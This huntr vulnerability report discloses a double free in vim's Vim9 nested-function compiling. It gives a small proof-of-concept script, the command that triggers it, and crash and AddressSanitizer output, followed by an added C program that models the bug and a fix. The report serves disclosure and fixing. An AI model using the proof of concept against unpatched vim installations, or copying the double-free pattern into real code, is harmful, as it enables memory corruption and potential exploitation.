huntr report A8BEE03A-6E2E-43BF-BEE3-4968C5386A2E
Dec 27, 2021 - 3:57 p.m.

None in vim/vim

2021-12-27 15:57:37
brenu
www.huntr.dev

7.8 High (CVSS3)
Attack Vector: LOCAL
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

6.8 Medium (CVSS2)
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P

EPSS: 0.001 Low
Percentile: 40.3%

Description

Hello there! Hope you are having an awesome day! 🤗

After I saw Rick de Jager's latest report, I decided to pick up their PoC as a valid input for fuzzing vim at patch 8.2.3912, and ended up finding a new case of double free!

For testing, I compiled vim with GCC 9.3.0, and my OS is Linux Mint 20.04 amd64.

Steps to Reproduce

Save the following file as poc:

def FirstFunction()
  def SecondFunction(
  )
  # Notice that the issue still happens if the right parenthesis
  # of the second function ends up on the next line
   
   enddef|BBBB
enddef
# Compile all functions
defcompile

After that, run vim with the following command:

vim -u NONE -X -Z -e -s -S poc -c :qa!

Running this should result in a double free being detected:

vim -u NONE -X -Z -e -s -S poc -c :qa!
free(): double free detected in tcache 2
Aborted (core dumped)

ASan Log

=================================================================
==802955==ERROR: AddressSanitizer: attempting double-free on 0x604000000410 in thread T0:
    #0 0x449add in free (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x449add)
    #1 0x11f3de5 in vim_free /home/exceed/Documents/fuzzing/vimtest/vim/src/alloc.c:619:2
    #2 0x11f3de5 in get_function_body /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:843:8
    #3 0x121b313 in define_function /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:4371:9
    #4 0x1268bed in compile_nested_function /home/exceed/Documents/fuzzing/vimtest/vim/src/vim9compile.c:881:13
    #5 0x1268bed in compile_def_function /home/exceed/Documents/fuzzing/vimtest/vim/src/vim9compile.c:2870:14
    #6 0x12240ef in ex_defcompile /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:4705:9
    #7 0x7ea32b in do_one_cmd /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:2572:2
    #8 0x7ea32b in do_cmdline /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:994:17
    #9 0xef5d80 in do_source /home/exceed/Documents/fuzzing/vimtest/vim/src/scriptfile.c:1423:5
    #10 0xf035b7 in cmd_source /home/exceed/Documents/fuzzing/vimtest/vim/src/scriptfile.c:985:14
    #11 0xf035b7 in ex_source /home/exceed/Documents/fuzzing/vimtest/vim/src/scriptfile.c:1011:2
    #12 0x7ea32b in do_one_cmd /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:2572:2
    #13 0x7ea32b in do_cmdline /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:994:17
    #14 0x14c1e61 in do_cmdline_cmd /home/exceed/Documents/fuzzing/vimtest/vim/src/ex_docmd.c:588:12
    #15 0x14c1e61 in exe_commands /home/exceed/Documents/fuzzing/vimtest/vim/src/main.c:3080:2
    #16 0x14c1e61 in vim_main2 /home/exceed/Documents/fuzzing/vimtest/vim/src/main.c:774:2
    #17 0x14b9920 in main /home/exceed/Documents/fuzzing/vimtest/vim/src/main.c:426:12
    #18 0x7fd8d254a0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #19 0x3cfced in _start (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x3cfced)

0x604000000410 is located 0 bytes inside of 34-byte region [0x604000000410,0x604000000432)
freed by thread T0 here:
    #0 0x449add in free (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x449add)
    #1 0x11ea6ed in vim_free /home/exceed/Documents/fuzzing/vimtest/vim/src/alloc.c:619:2
    #2 0x11ea6ed in get_function_args /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:221:6
    #3 0x1219def in define_function /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:4258:9
    #4 0x1268bed in compile_nested_function /home/exceed/Documents/fuzzing/vimtest/vim/src/vim9compile.c:881:13
    #5 0x1268bed in compile_def_function /home/exceed/Documents/fuzzing/vimtest/vim/src/vim9compile.c:2870:14
    #6 0x12240ef in ex_defcompile /home/exceed/Documents/fuzzing/vimtest/vim/src/userfunc.c:4705:9

previously allocated by thread T0 here:
    #0 0x449d5d in malloc (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x449d5d)
    #1 0x47d1d6 in lalloc /home/exceed/Documents/fuzzing/vimtest/vim/src/alloc.c:244:11

SUMMARY: AddressSanitizer: double-free (/home/exceed/Documents/fuzzing/vimtest/vim/src/vim+0x449add) in free
==802955==ABORTING

Impact

Use-after-frees / double frees can cause memory corruption, which can cause a crash or other undefined (potentially exploitable) behaviour.
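An added C illustration of the bug class, not vim's code and not part of the report: it models the two free sites in the ASan trace above (an argument parser that releases the caller's buffer on its error path, and a body parser that later releases the same pointer again), using a tracked free so the second release is reported instead of corrupting the heap. The names `tracked_free`, `parse_args`, `parse_body` and `define_function` and the `fixed` flag are hypothetical; the fix shown is the free-and-clear ownership rule.

```c
#include <stdlib.h>
#include <string.h>
/* Hypothetical model of the bug class in this report, not vim's code: the
 * argument parser releases the caller's buffer on its error path, and the
 * body parser later releases the same pointer again. A tiny tracked free
 * records each release so the second one is reported, not executed. */

#define MAX_TRACKED 8
static void *released[MAX_TRACKED];
static int n_released;

/* Returns 1 if p was already released (a double free); otherwise records and frees it. */
static int tracked_free(void *p) {
    if (p == NULL) return 0;                  /* free(NULL) is a no-op, as in libc */
    for (int i = 0; i < n_released; i++)
        if (released[i] == p) return 1;
    if (n_released < MAX_TRACKED) released[n_released++] = p;
    free(p);
    return 0;
}

/* Argument-list parser: fails when the line lacks a closing parenthesis
 * (as in the PoC's "def SecondFunction("). Returns 0 on success, -1 on error. */
static int parse_args(char **argbuf, const char *line, int clear_on_free) {
    if (strchr(line, ')') != NULL) return 0;
    tracked_free(*argbuf);
    if (clear_on_free) *argbuf = NULL;        /* the fix: never leave the caller a dangling owner */
    return -1;
}

/* Body parser: on its own failure it releases the argument buffer it believes
 * it still owns. Returns 1 if that release is a double free, 0 otherwise. */
static int parse_body(char **argbuf, const char *line) {
    if (strcmp(line, "enddef") == 0) return 0;
    int dbl = tracked_free(*argbuf);
    *argbuf = NULL;
    return dbl;
}

/* Models a define_function() that parses the body even after the argument
 * parse failed. Returns 1 when a double free was detected, 0 when not. */
int define_function(const char *args_line, const char *body_line, int fixed) {
    n_released = 0;
    char *argbuf = malloc(34);                /* 34 bytes, the region size in the ASan log */
    if (argbuf == NULL) return -1;
    parse_args(&argbuf, args_line, fixed);    /* error not propagated, so the body parse still runs */
    int dbl = parse_body(&argbuf, body_line);
    tracked_free(argbuf);                     /* final cleanup; argbuf is already NULL here */
    return dbl;
}
```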
